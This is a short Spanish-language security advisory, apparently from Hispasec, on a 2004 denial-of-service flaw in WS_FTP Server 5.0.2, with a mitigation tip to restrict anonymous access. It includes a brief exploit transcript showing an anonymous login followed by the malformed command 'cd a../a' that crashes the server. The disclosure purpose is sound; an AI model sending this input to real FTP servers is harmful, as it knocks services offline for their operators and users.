Se ha descubierto una vulnerabilidad en WS_FTP Server que podría ser
explotada por usuarios maliciosos para provocar una denegación de
servicio.
WS_FTP es uno de los servidores FTP más conocidos del mercado debido
en parte por su facilidad de uso y por su interfaz amigable.
Un problema en el procesamiento de direcciones de archivos, puede ser
explotado por un atacante para provocar que el consumo de recursos de
la CPU se eleve hasta el punto de causar una denegación del servicio en la
máquina atacada. Para ello tendrá que enviar un comando continuado
de una cadena de caracteres especialmente mal construida, con lo que
conseguirá un bucle infinito que conseguirá hacer caer el servidor.
Para que el atacante pueda conseguir su objetivo ha necesitado
autenticarse previamente ante el servidor. Si el servidor tiene el
acceso anónimo habilitado facilitará notablemente la posibilidad de
ataque. Es por ello que como medida preventiva se recomiende el
restringir este tipo de accesos mientras sale un parche que evite este
problema
Exploit:
E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.
roman@hispasec.com
Más información:
WS_FTP Server Denial of Service Vulnerability
http://www.webhostingtalk.nl/showthread/t-56462.html
WS_FTP Server’s Directory Traversal Protection Mechanism causing DoS
http://www.securiteam.com/windowsntfocus/5IP0V0ADPC.html
Deja un comentario